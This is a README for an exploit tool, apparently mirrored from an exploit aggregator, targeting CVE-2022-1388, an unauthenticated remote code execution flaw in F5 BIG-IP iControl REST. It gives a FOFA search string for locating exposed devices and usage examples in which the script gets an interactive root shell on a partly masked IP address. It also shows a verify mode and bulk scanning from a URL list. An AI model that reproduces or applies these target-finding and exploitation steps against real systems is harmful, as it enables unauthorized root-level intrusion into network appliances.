Share
## https://sploitus.com/exploit?id=4AA50D81-1CFC-5DDC-804E-F50243E3E9C7
# CVE-2022-1388

F5 BIG-IP Unauthenticated RCE Vulnerability

F5 BIG-IP iControl REST身份验证绕过RCE漏洞

`fofa keywords: title="BIG-IP®- Redirect"`

## usage

- attack

```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: whoami
root
[input your command]: 

```

- verify:

```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify
[+] https://203.xxx.xxx.xxx is vulnerable

$ python3 cve-2022-1388.py -f url.txt                                               
[+] https://203.xxx.xxx.xxx is vulnerable
```

## refer

- https://support.f5.com/csp/article/K23605346
- https://twitter.com/_0xf4n9x_/status/1523639281532620800